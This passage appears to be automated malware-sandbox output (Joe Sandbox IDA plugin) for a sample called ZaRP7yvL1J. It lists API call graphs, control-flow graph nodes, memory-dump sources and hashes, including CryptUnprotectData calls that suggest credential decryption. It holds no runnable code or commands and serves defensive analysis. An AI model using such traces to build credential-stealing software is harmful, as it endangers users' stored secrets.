CreateWindowExW 42948->42951 42952 390e0110 CreateWindowExW 42948->42952 42949->42931 42950->42949 42951->42949 42952->42949 42954 390e0178 CreateWindowExW 42953->42954 42956 390e0234 42954->42956 42958 390e0178 CreateWindowExW 42957->42958 42960 390e0234 42958->42960 42960->42960 42962 390e0948 42961->42962 42963 390e0965 42962->42963 42970 390e0970 42962->42970 42982 390e0980 42962->42982 42966 390e188c 42963->42966 42968 390e1897 42966->42968 42969 390e2866 42968->42969 43004 390e1934 42968->43004 42971 390e09c6 GetCurrentProcess 42970->42971 42973 390e0a18 GetCurrentThread 42971->42973 42974 390e0a11 42971->42974 42975 390e0a4e 42973->42975 42976 390e0a55 GetCurrentProcess 42973->42976 42974->42973 42975->42976 42977 390e0a8b 42976->42977 42994 390e0b4f 42977->42994 42998 390e0f31 42977->42998 42978 390e0ab3 GetCurrentThreadId 42979 390e0ae4 42978->42979 42979->42963 42983 390e09c6 GetCurrentProcess 42982->42983 42985 390e0a18 GetCurrentThread 42983->42985 42986 390e0a11 42983->42986 42987 390e0a4e 42985->42987 42988 390e0a55 GetCurrentProcess 42985->42988 42986->42985 42987->42988 42990 390e0a8b 42988->42990 42989 390e0ab3 GetCurrentThreadId 42991 390e0ae4 42989->42991 42992 390e0b4f 2 API calls 42990->42992 42993 390e0f31 42990->42993 42991->42963 42992->42989 42993->42989 43000 390e0bc8 DuplicateHandle 42994->43000 43002 390e0bc0 DuplicateHandle 42994->43002 42995 390e0b8e 42995->42978 42999 390e0f4e 42998->42999 42999->42978 43001 390e0c5e 43000->43001 43001->42995 43003 390e0c5e 43002->43003 43003->42995 43009 390e193f 43004->43009 43005 390e2e79 43006 390e2ea9 43005->43006 43007 390e2ac4 11 API calls 43005->43007 43011 390e2ed4 43006->43011 43025 390e2ac4 43006->43025 43007->43006 43009->43005 43009->43011 43015 390e3db2 43009->43015 43020 390e3e40 43009->43020 43010 390e2ec1 43031 390ed6c1 43010->43031 43011->42968 43016 390e3e61 43015->43016 43017 390e3e85 43016->43017 43037 390e3fe0 43016->43037 43043 390e3ff0 43016->43043 43017->43005 43022 390e3e61 43020->43022 43021 390e3e85 43021->43005 43022->43021 43023 390e3fe0 13 API calls 43022->43023 43024 390e3ff0 13 API calls 43022->43024 43023->43021 43024->43021 43026 390e2acf 43025->43026 43027 390e0938 10 API calls 43026->43027 43030 390ed0a1 43026->43030 43028 390ed0bb 43027->43028 43076 390ec544 43028->43076 43030->43010 43036 390ed6f1 43031->43036 43032 390ed899 43033 390e0938 10 API calls 43032->43033 43035 390ed77c 43033->43035 43034 390edad0 WaitMessage 43034->43036 43036->43032 43036->43034 43036->43035 43038 390e3ffd 43037->43038 43039 390e0938 10 API calls 43038->43039 43040 390e402b 43039->43040 43041 390e4036 43040->43041 43049 390e2bec 43040->43049 43041->43017 43044 390e3ffd 43043->43044 43045 390e0938 10 API calls 43044->43045 43046 390e402b 43045->43046 43047 390e4036 43046->43047 43048 390e2bec 13 API calls 43046->43048 43047->43017 43048->43047 43051 390e2bf7 43049->43051 43050 390e40a8 43051->43050 43053 390e2c20 43051->43053 43054 390e2c2b 43053->43054 43060 390e2c30 43054->43060 43056 390e4517 43064 390e91d8 43056->43064 43070 390e91f0 43056->43070 43057 390e4551 43057->43050 43061 390e2c3b 43060->43061 43062 390e57a0 43061->43062 43063 390e3e40 13 API calls 43061->43063 43062->43056 43063->43062 43066 390e9221 43064->43066 43067 390e9321 43064->43067 43065 390e922d 43065->43057 43066->43065 43068 387afab0 3 API calls 43066->43068 43069 387afaa1 3 API calls 43066->43069 43067->43057 43068->43067 43069->43067 43072 390e9221 43070->43072 43073 390e9321 43070->43073 43071 390e922d 43071->43057 43072->43071 43074 387afab0 3 API calls 43072->43074 43075 387afaa1 3 API calls 43072->43075 43073->43057 43074->43073 43075->43073 43078 390ec54f 43076->43078 43077 390ed3bb 43077->43030 43078->43077 43080 390ec560 43078->43080 43081 390ed3f0 OleInitialize 43080->43081 43082 390ed454 43081->43082 43082->43077 43083 390e2020 SetTimer 43084 390e208c 43083->43084 43085 390e20c0 43088 390e20ed 43085->43088 43086 390e213c 43086->43086 43088->43086 43089 390e17fc 43088->43089 43090 390e1807 43089->43090 43091 390e17d0 GetCurrentThreadId 43090->43091 43092 390e229c 43091->43092 43095 387a95e8 3 API calls 43092->43095 43096 387aec1a 43092->43096 43093 390e22a5 43093->43086 43095->43093 43097 387aec3a 43096->43097 43099 387aec47 43096->43099 43098 387ae7f4 3 API calls 43097->43098 43097->43099 43098->43099 43099->43093

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 146 d5f90-d5fc6 278 d5fc8 call d5f90 146->278 279 d5fc8 call d60e0 146->279 147 d5fce-d5fd4 148 d6024-d6028 147->148 149 d5fd6-d5fda 147->149 150 d603f-d6053 148->150 151 d602a-d6039 148->151 152 d5fdc-d5fe1 149->152 153 d5fe9-d5ff0 149->153 275 d6055 call d9048 150->275 276 d6055 call d90a8 150->276 277 d6055 call d8d90 150->277 154 d603b-d603d 151->154 155 d6065-d606f 151->155 152->153 156 d60c6-d6103 153->156 157 d5ff6-d5ffd 153->157 158 d605b-d6062 154->158 159 d6079-d607d 155->159 160 d6071-d6077 155->160 168 d610e-d612e 156->168 169 d6105-d610b 156->169 157->148 161 d5fff-d6003 157->161 164 d6085-d60bf 159->164 166 d607f 159->166 160->164 162 d6005-d600a 161->162 163 d6012-d6019 161->163 162->163 163->156 167 d601f-d6022 163->167 164->156 166->164 167->158 174 d6135-d613c 168->174 175 d6130 168->175 169->168 178 d613e-d6149 174->178 177 d64c4-d64cd 175->177 179 d614f-d6162 178->179 180 d64d5-d6511 178->180 185 d6178-d6193 179->185 186 d6164-d6172 179->186 189 d651a-d651e 180->189 190 d6513-d6518 180->190 194 d6195-d619b 185->194 195 d61b7-d61ba 185->195 186->185 192 d644c-d6453 186->192 193 d6524-d6525 189->193 190->193 192->177 198 d6455-d6457 192->198 196 d619d 194->196 197 d61a4-d61a7 194->197 199 d6314-d631a 195->199 200 d61c0-d61c3 195->200 196->197 196->199 201 d61da-d61e0 196->201 202 d6406-d6409 196->202 197->201 203 d61a9-d61ac 197->203 204 d6459-d645e 198->204 205 d6466-d646c 198->205 199->202 206 d6320-d6325 199->206 200->199 207 d61c9-d61cf 200->207 212 d61e6-d61e8 201->212 213 d61e2-d61e4 201->213 214 d640f-d6415 202->214 215 d64d0 202->215 208 d6246-d624c 203->208 209 d61b2 203->209 204->205 205->180 210 d646e-d6473 205->210 206->202 207->199 211 d61d5 207->211 208->202 218 d6252-d6258 208->218 209->202 216 d64b8-d64bb 210->216 217 d6475-d647a 210->217 211->202 219 d61f2-d61fb 212->219 213->219 220 d643a-d643e 214->220 221 d6417-d641f 214->221 215->180 216->215 222 d64bd-d64c2 216->222 217->215 223 d647c 217->223 224 d625e-d6260 218->224 225 d625a-d625c 218->225 227 d61fd-d6208 219->227 228 d620e-d6236 219->228 220->192 229 d6440-d6446 220->229 221->180 226 d6425-d6434 221->226 222->177 222->198 230 d6483-d6488 223->230 231 d626a-d6281 224->231 225->231 226->185 226->220 227->202 227->228 249 d623c-d6241 228->249 250 d632a-d6360 228->250 229->178 229->192 233 d64aa-d64ac 230->233 234 d648a-d648c 230->234 241 d62ac-d62d3 231->241 242 d6283-d629c 231->242 233->215 237 d64ae-d64b1 233->237 238 d648e-d6493 234->238 239 d649b-d64a1 234->239 237->216 238->239 239->180 244 d64a3-d64a8 239->244 241->215 255 d62d9-d62dc 241->255 242->250 253 d62a2-d62a7 242->253 244->233 245 d647e-d6481 244->245 245->215 245->230 249->250 256 d636d-d6375 250->256 257 d6362-d6366 250->257 253->250 255->215 258 d62e2-d630b 255->258 256->215 261 d637b-d6380 256->261 259 d6368-d636b 257->259 260 d6385-d6389 257->260 258->250 273 d630d-d6312 258->273 259->256 259->260 262 d63a8-d63ac 260->262 263 d638b-d6391 260->263 261->202 265 d63ae-d63b4 262->265 266 d63b6-d63d5 call d66b8 262->266 263->262 267 d6393-d639b 263->267 265->266 270 d63db-d63df 265->270 266->270 267->215 268 d63a1-d63a6 267->268 268->202 270->202 271 d63e1-d63fd 270->271 271->202 273->250 275->158 276->158 277->158 278->147 279->147
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                            • API String ID: 0-2525668591
                                                                                                            • Opcode ID: 161e22604441fbc6674f8f002b91483d3dba4eb7260a2882a35153413d57cc50
                                                                                                            • Instruction ID: d2aaa17ff5901c0775b475f83fa0c02ea1261a500fa9c5fc3da8be328f8077a7
                                                                                                            • Opcode Fuzzy Hash: 161e22604441fbc6674f8f002b91483d3dba4eb7260a2882a35153413d57cc50
                                                                                                            • Instruction Fuzzy Hash: D0022E31A00219DFDB54CFA9C984AAEBBF2BF88314F15806AE415AB361D736DD45CF60
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$4'^q
                                                                                                            • API String ID: 0-273632683
                                                                                                            • Opcode ID: a0d630746b9065124e9de2db5b88b9c8708ac27f29bba36794b65a56755e9c8e
                                                                                                            • Instruction ID: f1b4d377f14b321726e50d54299235665a8bbb72153bda3fe4690fbbd7a84f1d
                                                                                                            • Opcode Fuzzy Hash: a0d630746b9065124e9de2db5b88b9c8708ac27f29bba36794b65a56755e9c8e
                                                                                                            • Instruction Fuzzy Hash: FC824D75A00209DFCB15CFA8D984AAEBBF2FF88310F15855AE4059B3A5D731ED41CBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2116 d4328-d4368 2118 d436f-d444c call d3168 call d2c88 2116->2118 2119 d436a 2116->2119 2129 d444e 2118->2129 2130 d4453-d4471 2118->2130 2119->2118 2129->2130 2160 d4474 call d4620 2130->2160 2161 d4474 call d4612 2130->2161 2131 d447a-d4485 2132 d448c-d4490 2131->2132 2133 d4487 2131->2133 2134 d4495-d449c 2132->2134 2135 d4492-d4493 2132->2135 2133->2132 2137 d449e 2134->2137 2138 d44a3-d44b1 2134->2138 2136 d44b4-d44f8 2135->2136 2142 d455e-d4575 2136->2142 2137->2138 2138->2136 2144 d44fa-d4510 2142->2144 2145 d4577-d459c 2142->2145 2149 d453a 2144->2149 2150 d4512-d451e 2144->2150 2152 d459e-d45b3 2145->2152 2153 d45b4 2145->2153 2151 d4540-d455d 2149->2151 2154 d4528-d452e 2150->2154 2155 d4520-d4526 2150->2155 2151->2142 2152->2153 2156 d4538 2154->2156 2155->2156 2156->2151 2160->2131 2161->2131
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q$PH^q
                                                                                                            • API String ID: 0-1598597984
                                                                                                            • Opcode ID: 70516c0c0359f3d59ea5bade22621c01e2aa23b1103bc88f49c8435b27284ea4
                                                                                                            • Instruction ID: 664fc5feda93a062916382785b0d09757256e3a0dc9d1784dfae325c0dc94d99
                                                                                                            • Opcode Fuzzy Hash: 70516c0c0359f3d59ea5bade22621c01e2aa23b1103bc88f49c8435b27284ea4
                                                                                                            • Instruction Fuzzy Hash: E981D674E00258CFDB58DFA9D894A9DBBF2BF89300F14C06AE409AB365DB349985CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te^q
                                                                                                            • API String ID: 0-671973202
                                                                                                            • Opcode ID: f1569ffa2a2ccf8ced38796c446ae25b58b49d0863e894fc34bf17347f3b1ab0
                                                                                                            • Instruction ID: 4340f1ca9712d077fb4273df7937c635a6fd2fa70f0a257bea7b9451187e3739
                                                                                                            • Opcode Fuzzy Hash: f1569ffa2a2ccf8ced38796c446ae25b58b49d0863e894fc34bf17347f3b1ab0
                                                                                                            • Instruction Fuzzy Hash: B582A274A00228CFDB25DF64C994BADB7B2FB89300F1085E9D909A7364DB319E86DF54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te^q
                                                                                                            • API String ID: 0-671973202
                                                                                                            • Opcode ID: 260092be4d5dfa07be1e505f58fb69c39194e6906d3db5a90123ab92b49ac56b
                                                                                                            • Instruction ID: 16da9728598bd00367731c11715aaa8efb51746b360b873cca013ff8fa216332
                                                                                                            • Opcode Fuzzy Hash: 260092be4d5dfa07be1e505f58fb69c39194e6906d3db5a90123ab92b49ac56b
                                                                                                            • Instruction Fuzzy Hash: 4672B174A00218DFDB25DF64C994BA9BBB2FB89700F1085E9E909B7364CB359E81CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10d99affa0b7ef371ad9b101541e70129eb6fc73c146f898937ea21522b67451
                                                                                                            • Instruction ID: e9172e11367fa352739f0f95952d8595082a42457e9ed163fa24a6ce83e2a07b
                                                                                                            • Opcode Fuzzy Hash: 10d99affa0b7ef371ad9b101541e70129eb6fc73c146f898937ea21522b67451
                                                                                                            • Instruction Fuzzy Hash: BDD1373AE00709CFEB04DFA5C944B9DBBF2EF84304F158995D415AF2A5EB70A985CB80
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000BA,06338838,00000000,?,?,?,?), ref: 3805DA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 33c2cddac998f35fd3d3a2193530cdedfc037d0a63eabe0bfd695921f8e32c71
                                                                                                            • Instruction ID: 52c53678d70addc1950f8821118f15a2afa7f881eb65fd54b54d7b7a30c44837
                                                                                                            • Opcode Fuzzy Hash: 33c2cddac998f35fd3d3a2193530cdedfc037d0a63eabe0bfd695921f8e32c71
                                                                                                            • Instruction Fuzzy Hash: 7F1156B6800249DFDB10CF99D945BEEBFF1EF48320F14841AE954A7210C379A590CFA1
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000BA,06338838,00000000,?,?,?,?), ref: 3805DA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: a8650c1dfebb358ed0dbddc65773d19dcaa8cc0e9fe6fe9d4b606162a9f7fde6
                                                                                                            • Instruction ID: e436fc10b7ab602f50a1c93687df7cd0eb21cba3a6ec599d68c34ae6ed8dc2d3
                                                                                                            • Opcode Fuzzy Hash: a8650c1dfebb358ed0dbddc65773d19dcaa8cc0e9fe6fe9d4b606162a9f7fde6
                                                                                                            • Instruction Fuzzy Hash: 7E1156B2804249DFDB10CF99C905BDEBFF5EF48320F10846AE918A7210C379A990CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eec8eb94ca2a400d758924a2b9007cac600b6f5c3b8a5e63a467878365090d64
                                                                                                            • Instruction ID: a565d3f6868fbe6acae8086414c7b1965833258e766bb3f13d90d1eec2f85d49
                                                                                                            • Opcode Fuzzy Hash: eec8eb94ca2a400d758924a2b9007cac600b6f5c3b8a5e63a467878365090d64
                                                                                                            • Instruction Fuzzy Hash: 1A72AE74E05228CFDB64DF69C984BD9BBB2BB49300F1492E9E509AB351DB349E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 872237d8911144dbd38228f965d0ed113695aedcff11d231413f8e3455baa6ce
                                                                                                            • Instruction ID: 45b62c2689876a059cbb7a2729f7fc7187b72f8757b2541b4df17938a03c27bc
                                                                                                            • Opcode Fuzzy Hash: 872237d8911144dbd38228f965d0ed113695aedcff11d231413f8e3455baa6ce
                                                                                                            • Instruction Fuzzy Hash: A5E1C074E01218CFEB14CFA5C994B9DBBB2BF89304F2081A9D409B7395DB359A85CF24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f00ff30747775cba219dfe020c96cec4cf47d7f387695843106b00c4d9796d3
                                                                                                            • Instruction ID: 9d716715ea931b072b4a20e57a63a9b8676dd9bcb9f636618553f1a9854ad29a
                                                                                                            • Opcode Fuzzy Hash: 6f00ff30747775cba219dfe020c96cec4cf47d7f387695843106b00c4d9796d3
                                                                                                            • Instruction Fuzzy Hash: 3DC19074E00218CFDB54DFA5C994B9DBBB2BF89304F2081A9D809B7365DB359A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9362294e0eeae2ce2a5cefd07426c573d9d6c4805135c99d9d9b4b0d3ce0416
                                                                                                            • Instruction ID: 09fc4d45194dbdc9faab00ec476aa0583ae990c0946a910e09cc692e6dc67094
                                                                                                            • Opcode Fuzzy Hash: a9362294e0eeae2ce2a5cefd07426c573d9d6c4805135c99d9d9b4b0d3ce0416
                                                                                                            • Instruction Fuzzy Hash: 49A105B4D00208CFEB14DFA8C9847DDBBB2FF89304F2092A9E408A7291DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb0c3621947c5d6aa1db4e19d6f65edf4877247144c4198aea74c223b33b8d2c
                                                                                                            • Instruction ID: 61681cff2d3bdc66b5d8bf10796e4afeece9fb157739c0995caa7dbc270c6223
                                                                                                            • Opcode Fuzzy Hash: fb0c3621947c5d6aa1db4e19d6f65edf4877247144c4198aea74c223b33b8d2c
                                                                                                            • Instruction Fuzzy Hash: 24A10574D00208CFDB14DFA9D984BDDBBB2BF89314F209269E408A7391DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd118aa08b56e0643b3e09b2b375a61e45a2bde9d7bf8c734a3a58111e9a71cf
                                                                                                            • Instruction ID: a9f670489b3ffb5b7b730b478d9310e2d355865eb9a151a962808273e7109cae
                                                                                                            • Opcode Fuzzy Hash: bd118aa08b56e0643b3e09b2b375a61e45a2bde9d7bf8c734a3a58111e9a71cf
                                                                                                            • Instruction Fuzzy Hash: 0DA1A1B5E01218CFEB14CF6AC944B9DFBF2AB89300F10C1AAD408BB255DB355A85CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd3589a138d04e93acc9ea6743fbd86912e963a5ddd5e56e08d0fc2b837d0141
                                                                                                            • Instruction ID: 29a5090c3ae7ce7b17e66edfad9a476263fc60d2b79ccb1248d7a2eb9db76180
                                                                                                            • Opcode Fuzzy Hash: bd3589a138d04e93acc9ea6743fbd86912e963a5ddd5e56e08d0fc2b837d0141
                                                                                                            • Instruction Fuzzy Hash: ECA19275E012188FEB18CF6AC944B9DFBF2AB89300F14C1AAD40CB7255DB745A85CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 365368cb02ac6905ecf0acf8f2c616ee46ab5291bf4662e24e96c1466a0a37a0
                                                                                                            • Instruction ID: aff619d3d25f986fb200641cc00e72fe7a5ddc2b3735e40a66edd8d20de15cc9
                                                                                                            • Opcode Fuzzy Hash: 365368cb02ac6905ecf0acf8f2c616ee46ab5291bf4662e24e96c1466a0a37a0
                                                                                                            • Instruction Fuzzy Hash: 74A192B4E012588FEB18CF6AC944B9DFBF2AF89300F14D1AAD409B7255DB345A85CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: adad71f8747b3ff31845e8375b827af874f8f582944372e99664f3996beb16ee
                                                                                                            • Instruction ID: 9f1fdc1260c240839184b7e7dd45f3bdf6f5f01a96e5abd26386010b3a914c60
                                                                                                            • Opcode Fuzzy Hash: adad71f8747b3ff31845e8375b827af874f8f582944372e99664f3996beb16ee
                                                                                                            • Instruction Fuzzy Hash: CAA182B5E012188FEB54CF6AC944B9DBBF2AF89300F14D1AAD408B7255DB349A85CF21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951366044.0000000038050000.00000040.00000800.00020000.00000000.sdmp, Offset: 38050000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_38050000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bdf1afaa33bc6363c2ada369c15c8d9ea26d04ebc99fccc5e976d5f76089081e
                                                                                                            • Instruction ID: 1ef91a5c5d7759a746dfc3b56c9e11306429d5be690c5b06d67a4d355a258fd9
                                                                                                            • Opcode Fuzzy Hash: bdf1afaa33bc6363c2ada369c15c8d9ea26d04ebc99fccc5e976d5f76089081e
                                                                                                            • Instruction Fuzzy Hash: D991E374D04208CFEB10DFA8D984BDDBBB1FF49314F2092A9E409A7291DB749985CF65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4caf87b2051d969bdeeb3588971e19c6d2c94d44796ec1a62c728fa3ed353878
                                                                                                            • Instruction ID: 8da6b0a7897ea9699f8947ed09a8abe81fea4445d25affe9978a0bd0dc0630d4
                                                                                                            • Opcode Fuzzy Hash: 4caf87b2051d969bdeeb3588971e19c6d2c94d44796ec1a62c728fa3ed353878
                                                                                                            • Instruction Fuzzy Hash: 5681E574E01608CBDB14DFAAD99469DBBF3BF88310F24D629E414AB359DB345942CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f3161b57b8463cbeddbafc30a439c080479c9644e3cb907f6f4cc27220c4e5c
                                                                                                            • Instruction ID: 371ebbeae7df62e44fcbc3686de8d3534b302570fb4f4df1a516a9d6cf2e5a5b
                                                                                                            • Opcode Fuzzy Hash: 0f3161b57b8463cbeddbafc30a439c080479c9644e3cb907f6f4cc27220c4e5c
                                                                                                            • Instruction Fuzzy Hash: CC71B275D01228CFDB64CF66C9847DDBBB2BF89301F1491AAD419AB360DB359A82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 210179a494b23c467b49703b7cb310c0faa6ebad6e35103fa90798b375c3925e
                                                                                                            • Instruction ID: 57dd85ea65b069810c87a78673ca17e6f66f4892fb2898111079d5f53ca4b080
                                                                                                            • Opcode Fuzzy Hash: 210179a494b23c467b49703b7cb310c0faa6ebad6e35103fa90798b375c3925e
                                                                                                            • Instruction Fuzzy Hash: 187191B5E006588FEB28CF6AC944B9DFBF3AB89200F14C1AAD40DA7255DB344A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20a81546c5228f862747506a097c0f2d01cd255238368ecd5ba403e83b1677b1
